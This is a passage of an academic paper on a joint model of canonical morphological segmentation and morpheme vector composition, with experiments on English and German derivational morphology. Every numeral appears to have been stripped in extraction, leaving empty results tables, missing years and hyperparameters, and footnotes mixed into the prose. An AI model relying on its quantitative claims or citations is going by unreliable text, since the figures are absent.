the goal of the composition function cβ(s,l) is to stitch together morpheme embeddings to approximate the vector of the entire word. the simplest form of the composition function cβ(s,l) is add, an additive model of the morphemes. see table : each vector mlisi refers to a morpheme- specific, label-dependent embedding. if li = stem, then si represents a stem morpheme. given that our segmentation is canonical, an si that is a stem gen- erally itself is an entry in the lexicon and v(si) ∈ v . if v(si) ∈ v , then we set v(si) to . we optimize over vectors with li ∈ {prefix, suffix} as they corre- spond to bound morphemes. we also consider a more expressive composition model, a recurrent neural network (rnn). let n be the number of segments. then cβ(s,l) = hn where hi is a hidden vector, defined by the re- cursion: hi = tanh ( xhi− + um li si ) (elman, ). again, we optimize the morpheme embed- dings mlisi only when li = stem along with the other parameters of the rnn, i.e., the matrices u and x. inference and learning exact inference is intractable since we allow ar- bitrary segment-level features on the canonicalized word forms u. since the semi-crf factor has fea- tures that fire on substrings, we would need a dy- namic programming state for each substring of each of the exponentially many settings of u; this breaks the dynamic program. we thus turn to approximate inference through an importance sampling routine (rubinstein and kroese, ). . inference by importance sampling rather than considering all underlying orthographic forms u and segmentations s, we sample from a tractable proposal distribution q—a distribution over canonical segmentations. in the following equations we omit the dependence on w for notational brevity and define h(l,s,u) = f(s,l,u) + g(u,w). cru- cially, the partition function zθ(w) is not a function of parameter subvector β and its gradient with re- this is not changed in training, so all such v(si) are in the final model. clearly, this could be improved in future work as a reviewer points out, e.g., by setting such v(si) to an average of a suitable chosen set of known word vectors. we do not explore more complex rnns, e.g., lstms (hochreiter and schmidhuber, ) and grus (cho et al., a) as words in our data have ≤ morphemes. these archi- tectures make the learning of long distance dependencies eas- ier, but are no more powerful than an elman rnn, at least in theory. note that perhaps if applied to languages with richer derivational morphology than english, considering more com- plex neural architectures would make sense. spect to β is . recall that computing the gradi- ent of the log-partition function is equivalent to the problem of marginal inference (wainwright and jor- dan, ). we derive our estimator as follows: ∇θ log z = e (l,s,u)∼p [h(l,s,u)] ( ) = ∑ l,s,u p(l,s,u)h(l,s,u) ( ) = ∑ l,s,u q(l,s,u) q(l,s,u) p(l,s,u)h(l,s,u) ( ) = e (l,s,u)∼q [ p(l,s,u) q(l,s,u) h(l,s,u) ] , ( ) where we have omitted the dependence on w (which we condition on) and v (which we marginalize out). so long as q has support everywhere p does (i.e., p(l,s,u) > ⇒ q(l,s,u) > ), the estimate is un- biased. unfortunately, we can only efficiently com- pute p(l,s,u) up to a constant factor, p(l,s,u) = p̄(l,s,u)/z′θ(w). thus, we use the indirect impor- tance sampling estimator, ∑m i= w (i) m∑ i= w(i)h(l(i),s(i),u(i)), ( ) where (l( ),s( ),u( )) . . . (l(m),s(m),u(m)) i.i.d.∼ q and importance weights w(i) are defined as: w(i) = p̄(l(i),s(i),u(i)) q(l(i),s(i),u(i)) . ( ) this indirect estimator is biased, but consistent. proposal distribution. the success of impor- tance sampling depends on the choice of a “good” proposal distribution, i.e., one that ideally is close to p. since we are fully supervised at training time, we have the option of training locally normalized distributions for the individual components. con- cretely, we train two proposal distributions q (u | w) and q (l,s | u) that take the form of a wfst and a semi-crf, respectively, using features identical the subvector β is responsible for computing only the mean of the gaussian factor and thus has no impact on its nor- malization coefficient (murphy, ). informally, the indirect importance sampling estimate con- verges to the true expectation as m → ∞ (the definition of statistical consistency). to the joint model. each of these distributions is tractable—we can compute the marginals with dy- namic programming and thus sample efficiently. to draw samples (l,s,u) ∼ q, we sample sequentially from q and then q , conditioned on the output of q . . learning we optimize the log-likelihood of the model using adagrad (duchi et al., ), which is sgd with a special per-parameter learning rate. the full gra- dient of the objective for one training example is: ∇θ log p(v,s, l,u | w) = f(s,l,u)> + g(u,w)> − σ (v −cβ(s,l))∇θcβ(s,l) −∇θ log zθ(w), ( ) where we use the importance sampling algorithm described in § . to approximate the gradient of the log-partition function, following bengio and senecal ( ). note that ∇θcβ(s,l) depends on the composition function used. in the most com- plicated case when cβ is a rnn, we can com- pute ∇βcβ(s,l) efficiently with backpropagation through time (werbos, ). we take m = im- portance samples; using so few samples can lead to a poor estimate of the gradient, but for our application it suffices. we employ l regularization. . decoding decoding the model is also intractable. to approxi- mate the solution, we again employ importance sam- pling. we take m = , importance samples and select the highest weighted sample. related work the idea that vector semantics is useful for mor- phological segmentation is not new. count vectors (salton, ; turney and pantel, ) have been shown to be beneficial in the unsupervised induction of morphology (schone and jurafsky, ; schone and jurafsky, ). embeddings were shown to act similarly (soricut and och, ). our method differs from this line of research in two key ways. (i) we present a probabilistic model of the pro- cess of synthesizing the word’s meaning from the meaning of its morphemes. prior work was ei- ther not probabilistic or did not explicitly model morphemes. (ii) our method is supervised and fo- cuses on derivation. schone and jurafsky ( ) and soricut and och ( ), being fully unsupervised, do not distinguish between inflection and deriva- tion and schone and jurafsky ( ) focus on in- flection. more recently, narasimhan et al. ( ) look at the unsupervised induction of “morpholog- ical chains” with semantic vectors as a crucial fea- ture. their goal is to jointly figure out an ordering of word formation and a morphological segmenta- tion, e.g., play →playful →playfulness. while it is a rich model like ours, theirs differs in that it is un- supervised and uses vectors as features, rather than explicitly treating vector composition. all of the above work focuses on surface segmentation and not canonical segmentation, as we do. a related line of work that has different goals con- cerns morphological generation. two recent papers that address this problem using deep learning are faruqui et al. ( a) and faruqui et al. ( b). in an older line of work, yarowsky and wicen- towski ( ) and wicentowski ( ) exploit log frequency ratios of inflectionally related forms to tease apart that, e.g., the past tense of sing is not singed, but instead sang. related work by dreyer and eisner ( ) uses a dirichlet process to model a corpus as a “mixture of a paradigm”, allowing for the semi-supervised incorporation of distribu- tional semantics into a structured model of inflec- tional paradigm completion. our work is also related to recent attempts to in- tegrate morphological knowledge into general em- bedding models. for example, botha and blun- som ( ) train a log-bilinear language model that models the composition of morphological structure. likewise, luong et al. ( ) train a recursive neural network (goller and küchler, ) over a heuristi- cally derived tree structure to learn morphological composition over continuous vectors. our work is different in that we learn a joint model of segmen- tation and composition. moreover, supervised mor- phological analysis can drastically outperform unsu- pervised analysis (ruokolainen et al., ). early work by kay ( ) can be interpreted as finite-state canonical segmentation, but it neither ad- dresses nor experimentally evaluates the question of joint modeling of morphological analysis and se- mantic synthesis. moreover, we may view canoni- dev test model acc f edit acc f edit e n semi-crf (baseline) . (. ) . (. ) . (. ) . (. ) . (. ) . (. ) joint (baseline) . (. ) . (. ) . (. ) . (. ) . (. ) . (. ) joint + vec (this work) . (. ) . (. ) . (. ) . (. ) . (. ) . (. ) joint + ur (oracle) . (. ) . (. ) . (. ) . (. ) . (. ) . (. ) joint + ur + vec (oracle) . (. ) . (. ) . (. ) . (. ) . (. ) . (. ) d e semi-crf (baseline) . (. ) . (. ) . (. ) . (. ) . (. ) . (. ) joint (baseline) . (. ) . (. ) . (. ) . (. ) . (. ) . (. ) joint + vec (this work) . (. ) . (. ) . (. ) . (. ) . (. ) . (. ) joint + ur (oracle) . (. ) . (. ) . (. ) . (. ) . (. ) . (. ) joint + ur + vec (oracle) . (. ) . (. ) . (. ) . (. ) . (. ) . (. ) table : results for the canonical morphological segmentation task on english and german. standard deviation is given in parentheses. we compare against two baselines that do not make use of semantic vectors: (i) “semi-crf (baseline)”, a semi-crf that cannot account for orthographic changes and (ii) “joint (baseline)”, a version of our joint model without vectors. we also compare against an oracle version with access to gold urs (“joint + ur (oracle)”, “joint + ur + vec (oracle)”), revealing that the toughest part of the canonical segmentation task is reversing the orthographic changes. calization as an orthographic analogue to phonology. on this interpretation, the finite-state systems of ka- plan and kay ( ), which computationally apply spe-style phonological rules (chomsky and halle, ), may be run backwards to get canonical un- derlying forms. experiments and results we conduct experiments on english and german derivational morphology. we analyze our joint model’s ability to segment words into their canoni- cal morphemes as well as its ability to composition- ally derive vectors for new words. finally, we ex- plore the relationship between distributional seman- tics and morphological productivity. for english, we use the pretrained vectors of levy and goldberg ( a) for all experiments. for german, we train word vec skip-gram vectors on the german wikipedia. we first describe our en- glish dataset, the subset of the english portion of the celex lexical database (baayen et al., ) that was selected by lazaridou et al. ( ); the dataset contains , forms. this allows for com- parison with previously proposed methods. we make two modifications. (i) lazaridou et al. ( ) make the two-morpheme assumption: every word is composed of exactly two morphemes. in general, this is not true, so we further segment all complex words in the corpus. for example, friendless+ness is further segmented into friend+less+ness. to nevertheless allow for fair comparison, we pro- vide versions of our experiments with and without the two-morpheme assumption where appropriate. (ii) lazaridou et al. ( ) only provide a single train/test split. as we require a held-out develop- ment set for hyperparameter tuning, we randomly allocate a portion of the training data to select the hyperparameters and then retrain the model using these parameters on the original train split. we also report -fold cross validation results in addition to lazaridou et al.’s train/test split. our german dataset is taken from zeller et al. ( ) and is described in cotterell et al. ( b). it, again, consists of , derivational forms. we report results on -fold cross validation. . experiment : canonical segmentation for our first experiment, we test whether jointly modeling the continuous representations allows us to segment words more accurately. we assume that we are given an embedding for the target word. we estimate the model p(v,s, l,u | w) as described in § with l regularization λ||θ|| . to evaluate, we decode the distribution p(s,l,u | v,w). we per- form approximate map inference with importance sampling—taking the sample with the highest score. en de bow bow deps sg dev test dev test dev test dev test or ac le stem . . . . . . . . add . . . . . . . . lds . . . . . . . . rnn . . . . . . . . jo in t stem . . . . . . . . add . . . . . . . . lds . . . . . . . . rnn . . . . . . . . ch ar gru . . . . . . . . lstm . . . . . . . . table : vector approximation (measured by mean co- sine similarity) both with (“oracle”) and without (“joint”, “char”) gold morphology. surprisingly, joint models are close in performance to models with gold morphology. in these experiments, we use the rnn with the de- pendency vectors, the combination of which per- forms best on vector approximation in § . . we follow the experimental design of cotterell et al. ( b). we compare against two base- lines (marked “baseline” in table ): (i) a “semi- crf” segmenter that cannot account for ortho- graphic changes and (ii) the full “joint” model of cotterell et al. ( b). we additionally consider an “oracle” setting, where we give the model the gold underlying orthographic form (“ur”) at both training and test time. this gives us insight into the performance of the transduction factor of our model, i.e., how much could we benefit from a richer model. our hyperparameters are (i) the regularization coefficient λ and (ii) σ , the variance of the gaussian factor. we use grid search to tune them: λ ∈ { . , , , , , }, σ ∈ { . , . , . , . }. metrics. we use three metrics to evaluate segmen- tation accuracy. note that the evaluation of canon- ical segmentation is hard since a system may re- turn a sequence of morphemes whose concatenation is not the same length as the concatenation of the gold morphemes. this rules out metrics for surface segmentation like border f (kurimo et al., ), which require the strings to be of the same length. we now define the metrics. (i) segmentation accuracy measures whether every single canonical morpheme in the returned sequence is correct. it is inflexible: closer answers are penalized the same as i.e., a model without the gaussian factor that scores vectors. more distant answers. (ii) morpheme f (van den bosch and daelemans, ) takes the predicted se- quence of canonical morphemes, turns it into a set, computes precision and recall in the standard way and based on that then computes f . this metric gives credit if some of the canonical morphemes were correct. (iii) levenshtein distance joins the canonical segments with a special symbol # into a single string and computes the levenshtein distance between predicted and gold strings. discussion. results in table show that jointly modeling semantic coherence improves our ability to analyze words. for test, our proposed joint model (“this work”) outperforms the baseline supervised canonical segmenter, which is state-of-the-art for the task, by . (resp. . ) on accuracy and . (resp. . ) on f for english (resp. german). we also find that when we give the joint model an oracle ur the vectors generally help less: . (resp. . ) on ac- curacy and . (resp. . ) on f for english (resp. german). this indicates that the chief boon the vec- tor composition factor provides lies in selection of an appropriate ur. moreover, the up to . differ- ence in english between systems with and without the oracle ur suggests that reversing orthographic changes is a particularly difficult part of the task, at least for english. . experiment : vector approximation we adopt the experimental design of lazaridou et al. ( ). its aim is to approximate a vector of a derivationally complex word using a learned model of composition. as lazaridou et al. ( ) assume a gold morphological analysis, we compare two set- tings: (i) oracle morphological analysis and (ii) in- ferred morphological analysis. to the best of our knowledge, (ii) is a novel experimental condition that no previous work has addressed. we consider four composition models (see ta- ble ). (i) stem, using just the stem vector. this baseline tells us what happens if we make the incor- rect assumption that derivation behaves like inflec- tion and is not meaning-changing. (ii) add, a purely additive model. this is arguably the simplest way of combining the vectors of the morphemes. (iii) lds, a linear dynamical system. this is arguably the sim- plest sequence model. (iv) a (simple) rnn. recur- all hr lr -less in- un- l az ar id ou stem . . . . . . mult . . . . . . dil. . . . . . . wadd . . . . . . fulladd . . . . . . lexfunc . . . . . . b o w stem . . . . . . add . . . . . . lds . . . . . . rnn . . . . . . c-gru . . . . . . c-lstm . . . . . . b o w stem . . . . . . add . . . . . . lds . . . . . . rnn . . . . . . c-gru . . . . . . c-lstm . . . . . . d e p s stem . . . . . . add . . . . . . lds . . . . . . rnn . . . . . . c-gru . . . . . . c-lstm . . . . . . table : vector approximation (measured by mean cosine similarity) with gold morphology on the train/test split of lazaridou et al. ( ). hr/lr = high/low-relatedness words. see lazaridou et al. ( ) for details. rent neural networks are currently the most widely used nonlinear sequence model and simple rnns are the simplest such models. part of the motivation for considering a richer class of models lies in our removal of the two- morpheme assumption. indeed, it is unclear that the wadd and fulladd models (mitchell and lapata, ) are useful models in the general case of multi- morphemic words—the weights are tied by position, i.e., the first morpheme’s vector (be it a prefix or stem) is always multiplied by the same matrix. comparison with lazaridou et al. to compare with lazaridou et al. ( ), we use their exact train/test split. those results are reported in table . this dataset enforces that all words are composed of exactly two morphemes. thus, a word like unques- tionably is segmented as un+questionably, with- out further decomposition. the vectors employed by lazaridou et al. ( ) are high-dimensional count vectors derived from lemmatized and pos tagged text with a before-and-after window of size . they then apply pointwise mutual informa- tion (pmi) weighting and dimensionality reduction by non-negative matrix factorization. in contrast, we employ word vec (mikolov et al., a), a model that is also interpretable as the factorization of a pmi matrix (levy and goldberg, b). we con- sider three word vec models: two bag-of-word (bow) models with before-and-after windows of size and and deps (levy and goldberg, a), a dependency-based model whose context is derived from dependency parses rather than bow. in general, the results indicate that the key to better vector approximation is not a richer model of composition, but rather lies in the vectors them- selves. we find that our best model, the rnn, only marginally edges out the lds. additionally, looking at the “all” column and the deps vectors, the sim- ple additive model is only ≤. lower than lds. in comparison, we observe large differences between the vectors. the rnn+deps model is . bet- ter than the bow models (. vs. . ), . better than the bow models (. vs. . ) and . bet- ter than lazaridou et al.’s best model (. vs. . ). a wider context for bow ( instead of ) yields worse results. this suggests that syntactic infor- mation or at least positional information is neces- sary for improved models of morpheme composi- tion. the test vectors are annotated for relatedness, which is a proxy for semantic coherence. hr (high- relatedness) words were judged to be more compo- sitional than lr (low-relatedness) words. character-level neural retrofitting. as a fur- ther strong baseline, we consider a retrofitting (faruqui et al., ) approach based on character- level recurrent neural networks. recently, running a recurrent net over the character stream has become a popular way of incorporating subword information into a model—empirical gains have been observed in a diverse set of nlp tasks: pos tagging (dos santos and zadrozny, ; ling et al., ), pars- ing (ballesteros et al., ) and language modeling (kim et al., ). to the best of our knowledge, character-level retrofitting is a novel approach. given a vector v for a word form w, we seek a function to minimize the following objective ||v −hn|| , ( ) where hn is the final hidden state of a recurrent neu- ral architecture, i.e., hi = σ(ahi− + bwi), ( ) where σ is a non-linearity and wi is the ith char- acter in w, hi− is the previous hidden state and a and b are matrices. while we have defined the architecture for a vanilla rnn, we experiment with two more advanced recurrent architectures: grus (cho et al., b) and lstms (hochreiter and schmidhuber, ) as well as deep variants (sutskever et al., ; gillick et al., ; firat et al., ). importantly, this model has no knowledge of morphology—it can only rely on representations it extracts from the characters. this gives us a clear ablation on the benefit of adding structured morpho- logical knowledge. we optimize the depth and the size of the hidden units on development data using a coarse-grained grid search. we found a depth of and hidden units of size (in both lstm and gru) performed best. we trained all models for iterations of adam (kingma and ba, ) with l regularization with regularization coefficient . . table shows that the two character-level mod- els (“c-gru” and “c-lstm”) perform much worse than our models. this indicates that supervised mor- phological analysis produces higher-quality vector representations than “knowledge-poor” character- level models. however, we note that these character-level models have fewer parameters than our morpheme-level models—there are many more morphemes in a languages than characters. oracle morphology. in general, the two- morpheme assumption is incorrect. we consider an expanded setting of lazaridou et al. ( )’s task, in which we fully decompose the word, e.g., unquestionably →un+question+able+ly. these results are reported in table (top block, “oracle”). we report mean cosine similarity. standard devia- tions s for -fold cross-validation (not shown) are small (≤ . ) with two exceptions: s = . for the deps-joint-stem results (. and . ). the multi-morphemic results mirror those of the bi-morphemic setting of lazaridou et al. ( ). (i) rnn+deps attains an average cosine similarity of around . for english. numbers for german are lower, around . . (ii) the rnn only marginally edges out lds for english and is slightly worse for german. again, this is not surprising as we are mod- eling short sequences. (iii) certain embeddings lend themselves more naturally to derivational composi- tionality: bow is better than bow , deps is the clear winner. inferred morphology. the final setting we con- sider is the vector approximation task without gold morphology. in this case, we rely on the full joint model p(v,s, l,u | w). at evaluation, we are in- terested in the marginal distribution p(v | w) =∑ s,l,u p(v,s, l,u | w). we then use importance sampling to approximate the mean of this marginal distribution as the predicted embedding, i.e., v̂ = ∫ vp(v | w)dv ( ) ≈ ∑m i= w (i) m∑ i= w(i)cβ(l(i),s(i)), ( ) where w(i) are the importance weights defined in equation and l(i) and s(i) are the ith sampled la- beling and segmentation, respectively. discussion. surprisingly, table (joint) shows that relying on the inferred morphology does not drastically affect the results. indeed, we are often within . of the result with gold morphology. our method can be viewed as a retrofitting procedure (faruqui et al., ), so this result is useful: it indi- cates that joint semantic synthesis and morphologi- cal analysis produces high-quality vectors. . experiment : derivational productivity we now delve into the relation between distribu- tional semantics and morphological productivity. the extent to which jointly modeling semantics aids morphological analysis will be determined by the in- herent compositionality of the words within the vec- tor space. we break down our results on the vector approximation task with gold morphology using the -ly -ness -ize -able in- -ful -ous -less -ic -ist -y un- -ity re- -ion -ment -al -er affix . . . . . . . . . a v er a g e c o si n e s im il a ri ty figure : the boxplot breaks down the cosine similarity between the approximated vector and the target vector by affix (using gold morphology). we have ordered the affixes such that the better approximated vectors are on the left. dependency vectors and the rnn composer in fig- ure by selected affixes. we observe a wide range of scores: the most compositional ending ly gives rise to cosine similarities that are points higher than those of the least compositional er. on the left end of figure we see extremely pro- ductive suffixes. the affix ize is used productively with relatively obscure words in the sciences, e.g., rao-blackwellize. likewise, the affix ness can be applied to almost any adjective without restriction, e.g., poissonness ‘degree to which data have a pois- son distribution’. on the right end, we find -ment, -er and re-. the affix -ment is borderline productive (bauer, )—modern english tends to form novel nominalizations with ness or ity. more interesting are re- and er, both of which are very productive in english. for er, many of the words bringing down the average are simply non-compositional. for ex- ample, homer ‘homerun in baseball’ is not derived from home+er—this is an error in data. we also see examples like cutter. it has a compositional read- ing (e.g., “box cutter”), but also frequently occurs in the non-compositional meaning ‘type of boat’. fi- nally, proper nouns like homer and turner end in er and in our experiments we computed vectors for lowercased words. the affix re- similarly has a large number of non-compositional cases, e.g., remove, relocate, remark. indeed, to get the compositional reading of remove, the first syllable (rather than the second) is typically stressed to emphasize the prefix. we finally note several limitations of this exper- iment. (i) the ability of our models—even the re- current neural network—to model transformations between vectors is limited. (ii) our vectors are far from perfect; e.g., sparseness in the training data af- fects quality and some of the words in our corpus are rare. (iii) semantic coherence is not the only crite- rion for productivity. an example is -th in english. as noted earlier, it is compositional in a word like warmth, but it cannot be used to form new words. conclusion we have presented a model of the semantics and structure of derivationally complex words. to the best of our knowledge, this is the first attempt to jointly consider, within a single model, (i) the mor- phological decomposition of the word form and (ii) the semantic coherence of the resulting anal- ysis. we found that directly modeling coherence increases segmentation accuracy, improving over a strong baseline. also, our models show state-of-the- art performance on the derivational vector approxi- mation task introduced by lazaridou et al. ( ). future work will focus on the extension of the method to more complex instances of derivational morphology, e.g., compounding and reduplication, and on the extension to additional languages. we also plan to explore the relation between derivation and distributional semantics in greater detail. acknowledgments. the first author was sup- ported by a daad long-term research grant and an ndseg fellowship and the second by a volk- swagenstiftung opus magnum grant. we would also like to thank action editor regina barzilay for suggesting several changes we incorporated into the work and the three anonymous reviewers. references mohamed afify, ruhi sarikaya, hong-kwang jeff kuo, laurent besacier, and yuqing gao. . on the use of morphological analysis for dialectal arabic speech recognition. in ninth international conference on spoken language processing. mark aronoff. . word formation in generative grammar. mit press. harald baayen, richard piepenbrock, and hedderik van rijn. . the celex lexical data base on cd- rom. miguel ballesteros, chris dyer, and noah a. smith. . improved transition-based parsing by model- ing characters instead of words with lstms. in pro- ceedings of the conference on empirical meth- ods in natural language processing, pages – , lisbon, portugal, september. association for compu- tational linguistics. laurie bauer. . english word-formation. cam- bridge university press. yoshua bengio and jean-sébastien senecal. . quick training of probabilistic neural nets by impor- tance sampling. in proceedings of the ninth interna- tional conference on artificial intelligence and statis- tics. jan a. botha and phil blunsom. . compositional morphology for word representations and language modelling. in international conference on machine learning, pages – . kyunghyun cho, bart van merriënboer, dzmitry bah- danau, and yoshua bengio. a. on the properties of neural machine translation: encoder–decoder ap- proaches. workshop on syntax, semantics and struc- ture in statistical translation. kyunghyun cho, bart van merriënboer, caglar gul- cehre, dzmitry bahdanau, fethi bougares, holger schwenk, and yoshua bengio. b. learning phrase representations using rnn encoder-decoder for statistical machine translation. in conference on empirical methods in natural language processing. noam chomsky and morris halle. . the sound pat- tern of english. harper & row. noam chomsky. . aspects of the theory of syntax. mit press. ann clifton and anoop sarkar. . combin- ing morpheme-based machine translation with post- processing morpheme prediction. in proceedings of the th annual meeting of the association for com- putational linguistics: human language technolo- gies, pages – , portland, oregon, usa, june. as- sociation for computational linguistics. ryan cotterell, nanyun peng, and jason eisner. . stochastic contextual edit distance and probabilistic fsts. in proceedings of the nd annual meeting of the association for computational linguistics (vol- ume : short papers), pages – , baltimore, maryland, june. association for computational lin- guistics. ryan cotterell, thomas müller, alexander fraser, and hinrich schütze. . labeled morphological seg- mentation with semi-markov models. in proceed- ings of the nineteenth conference on computational natural language learning, pages – , beijing, china, july. association for computational linguis- tics. ryan cotterell, arun kumar, and hinrich schütze. a. morphological segmentation inside-out. in proceedings of the conference on empiri- cal methods in natural language processing, pages – , austin, texas, november. association for computational linguistics. ryan cotterell, tim vieira, and hinrich schütze. b. a joint model of orthography and morphological seg- mentation. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language tech- nologies, pages – , san diego, california, june. association for computational linguistics. mathias creutz and krista lagus. . unsupervised models for morpheme segmentation and morphology learning. acm transactions on speech and language processing, ( ): . cı́cero nogueira dos santos and bianca zadrozny. . learning character-level representations for part-of- speech tagging. in international conference on ma- chine learning, pages – . markus dreyer and jason eisner. . discover- ing morphological paradigms from plain text using a dirichlet process mixture model. in proceedings of the conference on empirical methods in natural language processing, pages – . association for computational linguistics, july. markus dreyer. . a non-parametric model for the discovery of inflectional paradigms from plain text using graphical models over strings. ph.d. thesis, johns hopkins university. john duchi, elad hazan, and yoram singer. . adaptive subgradient methods for online learning and stochastic optimization. journal of machine learning research, : – . jeffrey l. elman. . finding structure in time. cog- nitive science, ( ): – . manaal faruqui, jesse dodge, sujay kumar jauhar, chris dyer, eduard hovy, and noah a. smith. . retrofitting word vectors to semantic lexicons. in pro- ceedings of the conference of the north ameri- can chapter of the association for computational lin- guistics: human language technologies, pages – , denver, colorado, may–june. association for computational linguistics. manaal faruqui, ryan mcdonald, and radu soricut. a. morpho-syntactic lexicon generation using graph-based semi-supervised learning. transactions of the association for computational linguistics, : – . manaal faruqui, yulia tsvetkov, graham neubig, and chris dyer. b. morphological inflection gen- eration using character sequence to sequence learn- ing. in proceedings of the conference of the north american chapter of the association for com- putational linguistics: human language technolo- gies, pages – , san diego, california, june. as- sociation for computational linguistics. orhan firat, kyunghyun cho, and yoshua bengio. . multi-way, multilingual neural machine translation with a shared attention mechanism. in proceedings of the conference of the north american chap- ter of the association for computational linguistics: human language technologies, pages – , san diego, california, june. association for computa- tional linguistics. gottlob frege. . über begriff und gegenstand. vierteljahresschrift für wissenschaftliche philosophie, : – . dan gillick, cliff brunk, oriol vinyals, and amarnag subramanya. . multilingual language process- ing from bytes. in proceedings of the confer- ence of the north american chapter of the associa- tion for computational linguistics: human language technologies, pages – , san diego, califor- nia, june. association for computational linguistics. christoph goller and andreas küchler. . learning task-dependent distributed representations by back- propagation through structure. in ieee international conference on neural networks. kazuma hashimoto and yoshimasa tsuruoka. . adaptive joint learning of compositional and non- compositional phrase embeddings. in proceedings of the th annual meeting of the association for com- putational linguistics (volume : long papers), pages – , berlin, germany, august. association for computational linguistics. martin haspelmath and andrea sims. . under- standing morphology. routledge. irene heim and angelika kratzer. . semantics in generative grammar. blackwell. sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . katharina kann, ryan cotterell, and hinrich schütze. . neural morphological analysis: encoding- decoding canonical segments. in proceedings of the conference on empirical methods in natural language processing, pages – , austin, texas, november. association for computational linguis- tics. ronald m. kaplan and martin kay. . regular mod- els of phonological rule systems. computational lin- guistics, ( ): – . martin kay. . morphological and syntactic analysis. linguistic structures processing, : . yoon kim, yacine jernite, david sontag, and alexan- der m. rush. . character-aware neural language models. in proceedings of the thirtieth aaai confer- ence on artificial intelligence, pages – . diederik kingma and jimmy ba. . adam: a method for stochastic optimization. in international conference on learning representations. max kisselew, sebastian padó, alexis palmer, and jan šnajder. . obtaining a better understanding of distributional models of german derivational morphol- ogy. in proceedings of the th international confer- ence on computational semantics, pages – . daphne koller and nir friedman. . probabilistic graphical models: principles and techniques. mit press. lingpeng kong, chris dyer, and noah a smith. . segmental recurrent neural networks. in th interna- tional conference on learning representations. mikko kurimo, sami virpioja, ville turunen, and krista lagus. . morpho challenge competition – : evaluations and results. in special interest group on computational morphology and phonology. angeliki lazaridou, marco marelli, roberto zamparelli, and marco baroni. . compositional-ly derived representations of morphologically complex words in distributional semantics. in proceedings of the st annual meeting of the association for computational linguistics (volume : long papers), pages – , sofia, bulgaria, august. association for com- putational linguistics. omer levy and yoav goldberg. a. dependency- based word embeddings. in proceedings of the nd annual meeting of the association for computational linguistics (volume : short papers), pages – , baltimore, maryland, june. association for computa- tional linguistics. omer levy and yoav goldberg. b. neural word embedding as implicit matrix factorization. in ad- vances in neural information processing systems, pages – . marc light. . morphological cues for lexical se- mantics. in proceedings of the th annual meeting of the association for computational linguistics, pages – , santa cruz, california, usa, june. associa- tion for computational linguistics. wang ling, chris dyer, alan w. black, isabel trancoso, ramon fermandez, silvio amir, luis marujo, and tiago luis. . finding function in form: com- positional character models for open vocabulary word representation. in proceedings of the conference on empirical methods in natural language process- ing, pages – , lisbon, portugal, september. association for computational linguistics. thang luong, richard socher, and christopher man- ning. . better word representations with recur- sive neural networks for morphology. in proceedings of the seventeenth conference on computational nat- ural language learning, pages – , sofia, bul- garia, august. association for computational linguis- tics. john lyons. . semantics. cambridge university press. tomas mikolov, kai chen, greg corrado, and jeffrey dean. a. efficient estimation of word representa- tions in vector space. in th international conference on learning representations. tomas mikolov, ilya sutskever, kai chen, gregory s. corrado, and jeffrey dean. b. distributed rep- resentations of words and phrases and their composi- tionality. in advances in neural information process- ing systems, pages – . jeff mitchell and mirella lapata. . vector-based models of semantic composition. in proceedings of association of computational linguistics, pages – , columbus, ohio, june. association for computa- tional linguistics. kevin p. murphy. . machine learning: a proba- bilistic perspective. mit press. jason naradowsky and sharon goldwater. . im- proving morphology induction by learning spelling rules. in twenty-first international joint conference on artificial intelligence, pages – . karthik narasimhan, damianos karakos, richard schwartz, stavros tsakalidis, and regina barzilay. . morphological segmentation for keyword spot- ting. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – , doha, qatar, october. as- sociation for computational linguistics. karthik narasimhan, regina barzilay, and tommi jaakkola. . an unsupervised method for uncov- ering morphological chains. transactions of the asso- ciation for computational linguistics, : – . oup editors. . new oxford american dictionary. oxford university press. sebastian padó, alexis palmer, max kisselew, and jan šnajder. . measuring semantic content to as- sess asymmetry in derivation. in proceedings of the th international conference on computational se- mantics. lawrence r. rabiner. . a tutorial on hidden markov models and selected applications in speech recognition. proceedings of the institute of electrical and electronics engineers, ( ): – . pushpendre rastogi, ryan cotterell, and jason eisner. . weighting finite-state transductions with neu- ral context. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language tech- nologies, pages – , san diego, california, june. association for computational linguistics. eric s. ristad and peter n. yianilos. . learning string-edit distance. ieee transactions on pattern analysis and machine intelligence, ( ): – . reuven y. rubinstein and dirk p. kroese. . sim- ulation and the monte carlo method. john wiley & sons. teemu ruokolainen, oskar kohonen, sami virpioja, and mikko kurimo. . supervised morphological seg- mentation in a low-resource learning setting using con- ditional random fields. in proceedings of the sev- enteenth conference on computational natural lan- guage learning, pages – , sofia, bulgaria, au- gust. association for computational linguistics. gerard salton, editor. . the smart retrieval system—experiments in automatic document pro- cessing. prentice hall. sunita sarawagi and william w. cohen. . semi- markov conditional random fields for information ex- traction. in advances in neural information process- ing systems, pages – . patrick schone and daniel jurafsky. . knowledge- free induction of morphology using latent semantic analysis. in proceedings the th conference on com- putational natural language learning, pages – . association for computational linguistics. patrick schone and daniel jurafsky. . knowledge- free induction of inflectional morphologies. in pro- ceedings of the second meeting of the north american chapter of the association for computational linguis- tics on language technologies, pages – . associa- tion for computational linguistics. wolfgang seeker and özlem çetinoğlu. . a graph- based lattice dependency parser for joint morpholog- ical segmentation and syntactic analysis. transac- tions of the association for computational linguistics, : – . radu soricut and franz och. . unsupervised mor- phology induction using word embeddings. in pro- ceedings of the conference of the north ameri- can chapter of the association for computational lin- guistics: human language technologies, pages – , denver, colorado, may–june. association for computational linguistics. ilya sutskever, oriol vinyals, and quoc v. le. . se- quence to sequence learning with neural networks. in advances in neural information processing systems, pages – . charles sutton and andrew mccallum. . an in- troduction to conditional random fields for relational learning. in lise getoor and ben taskar, editors, introduction to statistical relational learning, pages – . mit press. peter d. turney and patrick pantel. . from fre- quency to meaning: vector space models of semantics. journal of artificial intelligence research, ( ): – . antal van den bosch and walter daelemans. . memory-based morphological analysis. in proceed- ings of the th annual meeting of the association for computational linguistics, pages – , college park, maryland, usa, june. association for compu- tational linguistics. martin j. wainwright and michael i. jordan. . graphical models, exponential families, and varia- tional inference. foundations and trends in machine learning, ( - ): – . zhen wang, jianwen zhang, jianlin feng, and zheng chen. . knowledge graph and text jointly em- bedding. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – , doha, qatar, october. association for computational linguistics. paul j. werbos. . backpropagation through time: what it does and how to do it. proceedings of the institute of electrical and electronics engineers, ( ): – . richard wicentowski. 